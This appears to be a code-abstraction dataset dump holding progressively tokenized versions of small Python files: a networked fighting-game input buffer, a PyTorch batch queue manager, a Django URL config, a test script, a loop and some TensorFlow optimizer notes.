<function token>\n <function token>\n <function token>\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n <function token>\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n 
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def clear(self):\n self._inputs.clear()\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n <function token>\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def clear(self):\n self._inputs.clear()\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n 
right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n <function token>\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n 
super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n <function token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = 
[input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n <function token>\n <function token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n<class token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n<class token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n <function token>\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n<class token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n <function token>\n <function token>\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n<class token>\n<class token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n<class token>\n<class token>\n" ]
false
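The input-buffer record closing here revolves around one mechanic: a frame-indexed buffer that stores inputs per frame and prunes entries older than a rolling window of `frame_limit` frames. A minimal, dependency-free sketch of that pattern (class and method names below are illustrative, not from the record):

class FrameInputBuffer:
    def __init__(self, frame_limit=12):
        self._inputs = {}            # frame number -> list of input values
        self._frame_limit = frame_limit

    def add_input(self, value, frame):
        self._inputs.setdefault(frame, []).append(value)

    def get_frame_inputs(self, frame):
        return self._inputs.get(frame, [])

    def poll(self, frame):
        # Drop inputs that have fallen out of the rolling window.
        self._inputs.pop(frame - self._frame_limit, None)
        return self.get_frame_inputs(frame)


buf = FrameInputBuffer(frame_limit=2)
buf.add_input('l', frame=10)
assert buf.poll(10) == ['l']
buf.poll(12)                         # frame 10 == 12 - 2 is pruned here
assert buf.poll(10) == []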
68
b693cc63e2ee4c994ef7b5e44faea99f15a021f6
import torch import torch.multiprocessing as mp import random class QManeger(object): def __init__(self, opt, q_trace, q_batch): self.traces_s = [] self.traces_a = [] self.traces_r = [] self.lock = mp.Lock() self.q_trace = q_trace self.q_batch = q_batch self.opt = opt self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") def _push_one(self, state, action, reward): self.traces_s.append(state) self.traces_a.append(action) self.traces_r.append(reward) def listening(self): while True: traces = self.q_trace.get(block=True) for s, a, r in zip(traces[0], traces[1], traces[2]): self._push_one(s, a, r) if len(self.traces_s) > self.opt.batch_size: self.produce_batch() def produce_batch(self): batch_size = self.opt.batch_size res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:batch_size], \ self.traces_r[:batch_size] # delete del self.traces_s[:batch_size] del self.traces_a[:batch_size] del self.traces_r[:batch_size] res_s = torch.FloatTensor(res_s).to(self.device) res_a = torch.LongTensor(res_a).to(self.device) res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1) # stack batch and put self.q_batch.put((res_s, res_a, res_r))
[ "import torch\nimport torch.multiprocessing as mp\nimport random\n\nclass QManeger(object):\n\n def __init__(self, opt, q_trace, q_batch):\n self.traces_s = []\n self.traces_a = []\n self.traces_r = []\n self.lock = mp.Lock()\n\n self.q_trace = q_trace\n self.q_batch = q_batch\n self.opt = opt\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n def _push_one(self, state, action, reward):\n self.traces_s.append(state)\n self.traces_a.append(action)\n self.traces_r.append(reward)\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:batch_size], \\\n self.traces_r[:batch_size]\n\n # delete\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n\n # stack batch and put\n self.q_batch.put((res_s, res_a, res_r))\n", "import torch\nimport torch.multiprocessing as mp\nimport random\n\n\nclass QManeger(object):\n\n def __init__(self, opt, q_trace, q_batch):\n self.traces_s = []\n self.traces_a = []\n self.traces_r = []\n self.lock = mp.Lock()\n self.q_trace = q_trace\n self.q_batch = q_batch\n self.opt = opt\n self.device = torch.device('cuda' if torch.cuda.is_available() else\n 'cpu')\n\n def _push_one(self, state, action, reward):\n self.traces_s.append(state)\n self.traces_a.append(action)\n self.traces_r.append(reward)\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n\n def __init__(self, opt, q_trace, q_batch):\n self.traces_s = []\n self.traces_a = []\n self.traces_r = []\n self.lock = mp.Lock()\n self.q_trace = q_trace\n self.q_batch = q_batch\n self.opt = opt\n self.device = torch.device('cuda' if torch.cuda.is_available() else\n 'cpu')\n\n def _push_one(self, state, action, reward):\n self.traces_s.append(state)\n self.traces_a.append(action)\n self.traces_r.append(reward)\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = 
torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n <function token>\n\n def _push_one(self, state, action, reward):\n self.traces_s.append(state)\n self.traces_a.append(action)\n self.traces_r.append(reward)\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n <function token>\n <function token>\n\n def listening(self):\n while True:\n traces = self.q_trace.get(block=True)\n for s, a, r in zip(traces[0], traces[1], traces[2]):\n self._push_one(s, a, r)\n if len(self.traces_s) > self.opt.batch_size:\n self.produce_batch()\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n <function token>\n <function token>\n <function token>\n\n def produce_batch(self):\n batch_size = self.opt.batch_size\n res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:\n batch_size], self.traces_r[:batch_size]\n del self.traces_s[:batch_size]\n del self.traces_a[:batch_size]\n del self.traces_r[:batch_size]\n res_s = torch.FloatTensor(res_s).to(self.device)\n res_a = torch.LongTensor(res_a).to(self.device)\n res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)\n self.q_batch.put((res_s, res_a, res_r))\n", "<import token>\n\n\nclass QManeger(object):\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n" ]
false
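Record 68's QManeger is a queue-to-queue batcher: `listening` drains (state, action, reward) traces from `q_trace` and, once enough have accumulated, `produce_batch` slices a fixed-size batch onto `q_batch` (note the record only fires when the buffer strictly exceeds `batch_size`). The same shape without the torch tensors, as a pure-Python sketch:

import queue

def produce_batches(q_trace, q_batch, batch_size=4):
    # Drain queued traces and emit full batches; leftovers stay buffered.
    buf_s, buf_a, buf_r = [], [], []
    while True:
        try:
            states, actions, rewards = q_trace.get(block=False)
        except queue.Empty:
            break
        buf_s.extend(states); buf_a.extend(actions); buf_r.extend(rewards)
        while len(buf_s) >= batch_size:
            q_batch.put((buf_s[:batch_size], buf_a[:batch_size], buf_r[:batch_size]))
            del buf_s[:batch_size], buf_a[:batch_size], buf_r[:batch_size]

q_trace, q_batch = queue.Queue(), queue.Queue()
q_trace.put(([0, 1, 2, 3, 4], ['a'] * 5, [1.0] * 5))
produce_batches(q_trace, q_batch)
print(q_batch.get())    # ([0, 1, 2, 3], ['a', 'a', 'a', 'a'], [1.0, 1.0, 1.0, 1.0])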
69
3c0beb7be29953ca2d7b390627305f4541b56efa
import sys sys.path.append("../circos_report/cnv_anno2conf") from cnv_anno2conf import main_cnv tarfile = {"yaml": "data/test_app.yaml"} def test_main_cnv(): main_cnv(tarfile) if __name__ == "__main__": test_main_cnv()
[ "import sys\nsys.path.append(\"../circos_report/cnv_anno2conf\")\nfrom cnv_anno2conf import main_cnv\n\n\ntarfile = {\"yaml\": \"data/test_app.yaml\"}\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\nif __name__ == \"__main__\":\n test_main_cnv()\n\n", "import sys\nsys.path.append('../circos_report/cnv_anno2conf')\nfrom cnv_anno2conf import main_cnv\ntarfile = {'yaml': 'data/test_app.yaml'}\n\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\n\nif __name__ == '__main__':\n test_main_cnv()\n", "<import token>\nsys.path.append('../circos_report/cnv_anno2conf')\n<import token>\ntarfile = {'yaml': 'data/test_app.yaml'}\n\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\n\nif __name__ == '__main__':\n test_main_cnv()\n", "<import token>\nsys.path.append('../circos_report/cnv_anno2conf')\n<import token>\n<assignment token>\n\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\n\nif __name__ == '__main__':\n test_main_cnv()\n", "<import token>\n<code token>\n<import token>\n<assignment token>\n\n\ndef test_main_cnv():\n main_cnv(tarfile)\n\n\n<code token>\n", "<import token>\n<code token>\n<import token>\n<assignment token>\n<function token>\n<code token>\n" ]
false
70
8d0fcf0bf5effec9aa04e7cd56b4b7098c6713cb
for i in range(-10,0): print(i,end=" ")
[ "for i in range(-10,0):\n print(i,end=\" \")", "for i in range(-10, 0):\n print(i, end=' ')\n", "<code token>\n" ]
false
71
a14114f9bb677601e6d75a72b84ec128fc9bbe61
from django.contrib import admin from django.urls import path, include, re_path from django.conf.urls import include # from rest_framework import routers from rest_framework.authtoken import views # from adventure.api import PlayerViewSet, RoomViewSet # from adventure.api import move # router = routers.DefaultRouter() # router.register('rooms', RoomViewSet) # router.register('currentRoom', PlayerViewSet) urlpatterns = [ path('admin/', admin.site.urls), path('api/', include('api.urls')), path('api/adv/', include('adventure.urls')), # path('api-token-auth', views.obtain_auth_token) ]
[ "from django.contrib import admin\nfrom django.urls import path, include, re_path\nfrom django.conf.urls import include\n# from rest_framework import routers\nfrom rest_framework.authtoken import views\n# from adventure.api import PlayerViewSet, RoomViewSet\n\n\n\n# from adventure.api import move\n\n# router = routers.DefaultRouter()\n# router.register('rooms', RoomViewSet)\n# router.register('currentRoom', PlayerViewSet)\n\n\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include('api.urls')),\n path('api/adv/', include('adventure.urls')),\n # path('api-token-auth', views.obtain_auth_token)\n]\n", "from django.contrib import admin\nfrom django.urls import path, include, re_path\nfrom django.conf.urls import include\nfrom rest_framework.authtoken import views\nurlpatterns = [path('admin/', admin.site.urls), path('api/', include(\n 'api.urls')), path('api/adv/', include('adventure.urls'))]\n", "<import token>\nurlpatterns = [path('admin/', admin.site.urls), path('api/', include(\n 'api.urls')), path('api/adv/', include('adventure.urls'))]\n", "<import token>\n<assignment token>\n" ]
false
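Record 71 leaves a DRF router commented out. If it were re-enabled, the conventional wiring registers the viewsets and includes `router.urls`; the viewset names below are taken from the record's own comments, and the rest is the standard rest_framework pattern:

from django.urls import include, path
from rest_framework import routers

from adventure.api import PlayerViewSet, RoomViewSet

router = routers.DefaultRouter()
router.register('rooms', RoomViewSet)
router.register('currentRoom', PlayerViewSet)

urlpatterns = [
    path('api/', include(router.urls)),   # exposes /api/rooms/ and /api/currentRoom/
]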
72
edb206a8cd5bc48e831142d5632fd7eb90abd209
import tensorflow as tf optimizer = tf.train.GradientDescentOptimizer(0.001).minimize(loss) _, l = sess.run([optimizer, loss], feed_dict={X:x, Y:y}) Session looks at all trainable variables that loss depends on and update them tf.Variable(initializer=None, trainable=True, collections=None, validate_shape=True, caching_device=None, name=None, variable_def=None, dtype=None, expected_shape=None, import_scope=None) List of optimizers in TF 1. tf.train.GradientDescentOptimizer 2. tf.train.AdagradOptimizer 3. tf.train.MomentumOptimizer 4. tf.train.AdamOptimizer 5. tf.train.ProximalGradientDescentOptimizer 6. tf.train.ProximalAdagradOptimizer 7. tf.train.RMSPropOptimizer And more
[ "import tensorflow as tf\noptimizer = tf.train.GradientDescentOptimizer(0.001).minimize(loss)\n_, l = sess.run([optimizer, loss], feed_dict={X:x, Y:y})\n\nSession looks at all trainable variables that loss depends on and update them\ntf.Variable(initializer=None, trainable=True, collections=None, validate_shape=True, caching_device=None,\n name=None, variable_def=None, dtype=None, expected_shape=None, import_scope=None)\n\nList of optimizers in TF\n1. tf.train.GradientDescentOptimizer\n2. tf.train.AdagradOptimizer\n3. tf.train.MomentumOptimizer\n4. tf.train.AdamOptimizer\n5. tf.train.ProximalGradientDescentOptimizer\n6. tf.train.ProximalAdagradOptimizer\n7. tf.train.RMSPropOptimizer\nAnd more" ]
true
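Record 72 is the one entry in this stretch flagged `error: true`: it is lecture-style notes saved as a .py file, so everything after the first three statements is a syntax error, and `loss`, `sess`, `X`, and `Y` are never defined. A minimal self-contained version of the same idea, assuming TensorFlow 1.x (where `tf.train.GradientDescentOptimizer` exists):

import tensorflow as tf   # TF 1.x API

# A tiny linear-regression graph so that `loss` actually exists.
X = tf.placeholder(tf.float32, name='X')
Y = tf.placeholder(tf.float32, name='Y')
w = tf.Variable(0.0, name='weight')
b = tf.Variable(0.0, name='bias')
loss = tf.square(Y - (w * X + b), name='loss')

# minimize() collects every trainable variable `loss` depends on and updates it.
optimizer = tf.train.GradientDescentOptimizer(0.001).minimize(loss)

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for x, y in [(1.0, 2.0), (2.0, 4.0), (3.0, 6.0)]:
        _, l = sess.run([optimizer, loss], feed_dict={X: x, Y: y})
        print(l)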
73
36991c3191ba48b1b9dbd843e279f8fe124f1339
